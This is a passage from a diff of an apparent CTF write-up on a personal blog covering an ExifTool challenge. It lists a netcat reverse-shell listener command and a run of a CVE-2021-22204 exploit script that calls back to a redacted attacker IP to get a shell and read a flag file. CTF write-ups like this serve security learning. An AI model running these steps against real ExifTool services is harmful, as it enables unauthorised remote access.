gvido-berzins/blog.syberu.xyz/blog/content/articles/Write-ups/cyber-shock-ctf-2022.md

 2. Launch a `netcat` utility reverse shell listener on `9001` port: `nc -lvnp 9001`
 3. Launch a CVE exploit and specify IP address through `-s` flag: `python3 exploit-CVE-2021-22204.py -s 10.X.Y.Z 9001` (here the real IPv4 address is hidden on purpose).
 4. Upload any file to the ExifTool service.
 5. Shell exploit works - by looking inside `/home` folder a suspicious `/user1337` folder is found - inside it a `flag.txt` file can be seen.
-Retrieved flag from the file is : `ctftech{ff379755-33f3}`.
+Retrieved flag from the file.

 #### SMART BIKE